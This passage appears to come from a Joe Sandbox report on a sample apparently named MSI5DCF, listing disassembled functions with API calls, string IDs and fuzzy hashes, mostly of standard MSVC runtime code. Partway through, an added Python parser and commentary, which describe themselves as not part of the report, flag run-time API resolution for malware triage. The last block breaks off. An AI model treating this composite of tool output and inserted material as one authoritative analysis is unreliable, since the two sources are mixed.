                                                                        • Opcode Fuzzy Hash: b048d5c17c0039fd38d184eeeb9ac0e0c1beab54ada5308d34e5b33fb5359939
                                                                        • Instruction Fuzzy Hash: 92918E70910249CFDB18CFA8C55879EFBB1FF94304F24861ED456AB391DBB5AA84CB50
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADB5ED
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        • LocalFree.KERNEL32 ref: 00ADB6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                        • String ID:
                                                                        • API String ID: 1378673503-0
                                                                        • Opcode ID: 4fb45ab6e8d45144de4ec08e146f8fb33e8223680707310e61b5e78d68c96065
                                                                        • Instruction ID: f5c941c9108d71ec5d6e4994e5f880ca064f743d4eac62e406df23e7f927e7e8
                                                                        • Opcode Fuzzy Hash: 4fb45ab6e8d45144de4ec08e146f8fb33e8223680707310e61b5e78d68c96065
                                                                        • Instruction Fuzzy Hash: 4C51CE71810659DFCB20DF58E944BAEBBF4FF04324F25465AE822A7390D770AE44CBA0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 3509577899-3206640213
                                                                        • Opcode ID: f3991a1f38b400c86812d129c4e89fac514f5234ab88a77178c055ef191eac47
                                                                        • Instruction ID: 4d9a7880c28b547c7a9e094b0fd9c115149727da32a6e44a4ed2c5402903cefe
                                                                        • Opcode Fuzzy Hash: f3991a1f38b400c86812d129c4e89fac514f5234ab88a77178c055ef191eac47
                                                                        • Instruction Fuzzy Hash: C7C1A031900A159BDB349F68C889ABB7FF4FF05300F2482DAE505ABAD1E6359D41CF61
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00AFAEEC,00AF9710,00AF85A3), ref: 00AFAF03
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AFAF11
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AFAF2A
                                                                        • SetLastError.KERNEL32(00000000,00AFAEEC,00AF9710,00AF85A3), ref: 00AFAF7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 892605207cf201b280f52b4c5e7a5c6312e2b3405b3cf6e6ba0b7e568358638f
                                                                        • Instruction ID: add748ae2f56b04c6adfc8c9ddb40e59805c4e5ab0a960b3b6769124f09f0558
                                                                        • Opcode Fuzzy Hash: 892605207cf201b280f52b4c5e7a5c6312e2b3405b3cf6e6ba0b7e568358638f
                                                                        • Instruction Fuzzy Hash: 980124B228D31D6EE62827F6AE85BBB6694DB11BB07300329F3185B0E1EF164E106745
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$GetvalsH_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2204710431-1686923651
                                                                        • Opcode ID: d778f06cc8b1c65d03d81bab0bf2da3be23c6a838bd36580f4cb194c0bb1f7ef
                                                                        • Instruction ID: 78e5cbac18c146d71fb9af11180ec1f2f0baaabc9c122f880cf2b935761edd23
                                                                        • Opcode Fuzzy Hash: d778f06cc8b1c65d03d81bab0bf2da3be23c6a838bd36580f4cb194c0bb1f7ef
                                                                        • Instruction Fuzzy Hash: E221B0B1904B966EDB21DF75849077BBEF8AB08300B044A5AE199C7A42E734E601CB90
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(B7207CF4,B7207CF4,?,?,00000000,00B1A221,000000FF), ref: 00AD847B
                                                                          • Part of subcall function 00AF7875: EnterCriticalSection.KERNEL32(00B34AF8,00000000,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF7880
                                                                          • Part of subcall function 00AF7875: LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26,?,?,?,B7207CF4), ref: 00AF78BD
                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AD8440
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD8447
                                                                          • Part of subcall function 00AF782B: EnterCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7835
                                                                          • Part of subcall function 00AF782B: LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7868
                                                                          • Part of subcall function 00AF782B: RtlWakeAllConditionVariable.NTDLL ref: 00AF78DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                        • String ID: IsWow64Process$kernel32
                                                                        • API String ID: 2056477612-3789238822
                                                                        • Opcode ID: 17cdce98fdb36a2611246dc84d20e934b6186beee1d4bef6f047d633cced7270
                                                                        • Instruction ID: dc9d3a901629f3c60a8012e031592574cded02a82ebb37b078f3156ab7e4f890
                                                                        • Opcode Fuzzy Hash: 17cdce98fdb36a2611246dc84d20e934b6186beee1d4bef6f047d633cced7270
                                                                        • Instruction Fuzzy Hash: A21175B5D44715EFCB20DF94ED05BAD77A8FB08720F20465AE91593390DF756900CA90
                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B7207CF4,?,?,00000000,00B1CBE4,000000FF,?,00B083F1,?,?,00B083C5,?), ref: 00B08496
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B084A8
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00B1CBE4,000000FF,?,00B083F1,?,?,00B083C5,?), ref: 00B084CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                         • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: b0900e5aded69f830ae0cde292db69788dbb1f998447c15e27959acbb1bc4b80
                                                                        • Instruction ID: b923aa4938d5c8d03ad039e842627d21703dd7735061d0efaee72bd1056da2df
                                                                        • Opcode Fuzzy Hash: b0900e5aded69f830ae0cde292db69788dbb1f998447c15e27959acbb1bc4b80
                                                                        • Instruction Fuzzy Hash: 5A016231944629BFDB119F54DC45BEEBBF9FB04B15F008565E811E36E0DF789900CA90
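The function blocks in this report list, per routine, the API calls the IDA plugin recovered (with the subcalls they reach), the string literals it references, an "API String ID" pair that appears to be derived from the API ID and String ID tokens, and a fuzzy hash of the instruction bytes. Pivoting on those across reports is easier with the blocks as structured records. The parser below is an added example, not part of the Joe Sandbox report or its plugin: it reads blocks in the plain-text format shown on this page (a constructed sample is embedded, built from two of the blocks above with the subcall arguments shortened) and flags routines that resolve APIs at run time through GetProcAddress, which is how the "IsWow64Process"/"kernel32" and "CorExitProcess"/"mscoree.dll" strings above appear. All function and field names are the example's own.

```python
"""Turn Joe Sandbox IDA-plugin function blocks into records and flag
run-time API resolution.  Added example in the report's own text format;
every function and field name here is the example's, not the plugin's."""
import re
from typing import Dict, List, Optional

# Constructed sample: two blocks from this report, subcall arguments shortened.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(B7207CF4,B7207CF4,?,?,00000000,00B1A221,000000FF), ref: 00AD847B
  • Part of subcall function 00AF7875: EnterCriticalSection.KERNEL32(00B34AF8,00000000), ref: 00AF7880
• GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AD8440
• GetProcAddress.KERNEL32(00000000), ref: 00AD8447
Strings
Memory Dump Source
• Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
• String ID: IsWow64Process$kernel32
• API String ID: 2056477612-3789238822
• Instruction Fuzzy Hash: A21175B5D44715EFCB20DF94ED05BAD77A8FB08720F20465AE91593390DF756900CA90
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000), ref: 00B08496
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B084A8
• FreeLibrary.KERNEL32(00000000), ref: 00B084CA
Strings
Memory Dump Source
• Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Instruction Fuzzy Hash: 5A016231944629BFDB119F54DC45BEEBBF9FB04B15F008565E811E36E0DF789900CA90
"""

# "Name.MODULE(arg,...), ref: ADDR"; the argument list and the comma are optional.
CALL_RE = re.compile(
    r"^(?P<name>.+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<addr>[0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<caller>[0-9A-F]{8}): (?P<rest>.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_call(text: str) -> Optional[Dict]:
    """One call line -> {name, module, args, addr}, or None if it is not a call."""
    m = CALL_RE.match(text)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "addr": m.group("addr")}


def parse_blocks(report: str) -> List[Dict]:
    """Split the text at each 'APIs' header and collect the calls, subcalls,
    string entries and 'Key: value' metadata of every function block."""
    blocks: List[Dict] = []
    section = None
    for raw in report.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if section == "APIs":
                blocks.append({"calls": [], "subcalls": [], "strings": [], "meta": {}})
            continue
        if not blocks or section is None or not line.startswith("•"):
            continue
        body, blk = line[1:].strip(), blocks[-1]
        if section == "APIs":
            sub = SUBCALL_RE.match(body)
            call = parse_call(sub.group("rest") if sub else body)
            if call and sub:
                call["caller"] = sub.group("caller")
                blk["subcalls"].append(call)
            elif call:
                blk["calls"].append(call)
        elif section == "Strings":
            blk["strings"].append(body)
        else:
            key, _, value = body.partition(":")
            blk["meta"][key.strip()] = value.strip()
    for blk in blocks:
        # "API String ID: A-B" is the pair the report shows for similarity pivots.
        a, _, b = blk["meta"].get("API String ID", "").partition("-")
        blk["api_string_id"] = (int(a), int(b)) if a and b else None
        blk["string_ids"] = [s for s in blk["meta"].get("String ID", "").split("$") if s]
    return blocks


def resolved_names(block: Dict) -> List[str]:
    """Strings a routine hands to the loader when it calls GetProcAddress:
    literal arguments the plugin recovered, plus the block's String ID list."""
    names, uses_gpa = set(), False
    for call in block["calls"]:
        if call["name"] == "GetProcAddress":
            uses_gpa = True
            names.update(a for a in call["args"] if a and not re.fullmatch(r"[0-9A-F]{8}|\?", a))
    if uses_gpa:
        names.update(block["string_ids"])
    return sorted(names)


if __name__ == "__main__":
    for blk in parse_blocks(SAMPLE):
        entry = blk["calls"][0]["addr"] if blk["calls"] else "?"
        print(entry, blk["api_string_id"], resolved_names(blk))
```

Both sample blocks are flagged, and both deserve a second look before being read as evasion: resolving IsWow64Process through GetModuleHandleW/GetProcAddress is a common compatibility idiom for code that must run on systems where the export is absent, and the GetModuleHandleExW("mscoree.dll") / GetProcAddress("CorExitProcess") / FreeLibrary sequence is the MSVC C runtime's normal exit path, emitted by the compiler rather than written by the sample's author. Run-time resolution is a pivot for triage, not a verdict.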
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AEDDD9
                                                                        • collate.LIBCPMT ref: 00AEDF54
                                                                        • numpunct.LIBCPMT ref: 00AEE1CE
                                                                          • Part of subcall function 00AE83C2: __EH_prolog3.LIBCMT ref: 00AE83C9
                                                                          • Part of subcall function 00AE815A: __EH_prolog3.LIBCMT ref: 00AE8161
                                                                          • Part of subcall function 00AE815A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE816B
                                                                          • Part of subcall function 00AE815A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE81DC
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB1D
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB40
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB68
                                                                          • Part of subcall function 00ADEAF0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC07
                                                                          • Part of subcall function 00AE4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
                                                                          • Part of subcall function 00AE764B: __EH_prolog3.LIBCMT ref: 00AE7652
                                                                          • Part of subcall function 00AE764B: std::_Lockit::_Lockit.LIBCPMT ref: 00AE765C
                                                                          • Part of subcall function 00AE764B: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE76CD
                                                                        • __Getcoll.LIBCPMT ref: 00AEDF94
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                          • Part of subcall function 00ADB9E0: __Getctype.LIBCPMT ref: 00ADB9EB
                                                                          • Part of subcall function 00AE7A5E: __EH_prolog3.LIBCMT ref: 00AE7A65
                                                                          • Part of subcall function 00AE7A5E: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7A6F
                                                                          • Part of subcall function 00AE7A5E: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7AE0
                                                                          • Part of subcall function 00AE7B88: __EH_prolog3.LIBCMT ref: 00AE7B8F
                                                                          • Part of subcall function 00AE7B88: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B99
                                                                          • Part of subcall function 00AE7B88: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C0A
                                                                          • Part of subcall function 00AE7DDC: __EH_prolog3.LIBCMT ref: 00AE7DE3
                                                                          • Part of subcall function 00AE7DDC: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7DED
                                                                          • Part of subcall function 00AE7DDC: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7E5E
                                                                          • Part of subcall function 00AE7D47: __EH_prolog3.LIBCMT ref: 00AE7D4E
                                                                          • Part of subcall function 00AE7D47: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7D58
                                                                          • Part of subcall function 00AE7D47: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7DC9
                                                                          • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
                                                                          • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                          • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • codecvt.LIBCPMT ref: 00AEE27F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2252558201-0
                                                                        • Opcode ID: efd4a87e10dd02aaf20020f88f35aa83d6b6ce2f213cffff84c5877377336201
                                                                        • Instruction ID: 5fd2154664fe5c999b9095e4ee44ecbb698b42a37b5983e665d7c6638b59d983
                                                                        • Instruction Fuzzy Hash: ADE104B190029AAFDB21AF668D026BF7EB9FF55350F15452EF9196B381EF308C108791
                                                                        APIs
                                                                        • __alloca_probe_16.LIBCMT ref: 00B0C409
                                                                        • __alloca_probe_16.LIBCMT ref: 00B0C4CA
                                                                        • __freea.LIBCMT ref: 00B0C531
                                                                          • Part of subcall function 00B0B127: HeapAlloc.KERNEL32(00000000,?,?,?,00B0AAAA,?,00000000,?,00AFC282,?,?,?,?,?,?,00AD1668), ref: 00B0B159
                                                                        • __freea.LIBCMT ref: 00B0C546
                                                                        • __freea.LIBCMT ref: 00B0C556
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 1096550386-0
                                                                        • Opcode ID: 7f411535b509cc5248705a7b023e1946c31583475cb3fbef0449ff941141c610
                                                                        • Instruction ID: ed619ab069786dced9a42cde596bf56e9f5862dcc97f304c67d8368056e95913
                                                                        • Instruction Fuzzy Hash: FE51A572600116AFEF215F64DC92EBF7EE9EF54354B1542A8FD08D6291EB31ED1087A0
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADC67D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 21053eca8456f067447b7d3c144c1c86df213edd1c2c662266b95fa7f8d381d0
                                                                        • Instruction ID: b6b43425285161a123cda45b8ac6e3854b86d96597af28eb3e94b029a8674d53
                                                                        • Instruction Fuzzy Hash: 3141A071C0069ADFCB11DF68D940BAEBBF4EF04724F68425AE815A7391DB34AE04CB91
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB1D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEB40
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEB68
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADEBDD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEC07
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 77b70e9a0c3203aefd1d2a4042b168198eb18478afa6ba830b9f764e1a7bb43f
                                                                        • Instruction ID: b6fd1e522263b253699fd268997af69a8553190d5e7f9cb54fc61a0d9c997b90
                                                                        • Instruction Fuzzy Hash: 2C41A071900659DFCB11DF58D944B9EBBB4FB04724F24869AE816AB391DB30BE04CB91
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC5D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEC80
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADECA8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADED1D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADED47
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 4f19e5a7788a0db2f199469b4bd0bc91255314c6f107cc359329bc0ae13cbc09
                                                                        • Instruction ID: 809204f858380c9973eed6b582fa8378ba3a5cf763ce1f4484a28b5528a74316
                                                                        • Instruction Fuzzy Hash: E6410571C10659DFCB11DF68D940BAEBBB4FB04724F24465AE812AB391DB31AE04CBD1
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADED9D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADEDC0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEDE8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADEE5D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADEE87
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: fbd5943c211e6207eca11c4bc1eb149b9644de645a79da74f389d523c65efefd
                                                                        • Instruction ID: 42c78a3bec7d068d21c75fdc9f84205800fc6c580714135778b9ef9a11c9fb8e
                                                                        • Instruction Fuzzy Hash: 0941D571D00255EFCB11DF68D9407AEBBB4FB04724F24465AE816AB391DB30AE44CBD1
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000010,00000010,?,00AD7912,?,?), ref: 00AD7C37
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
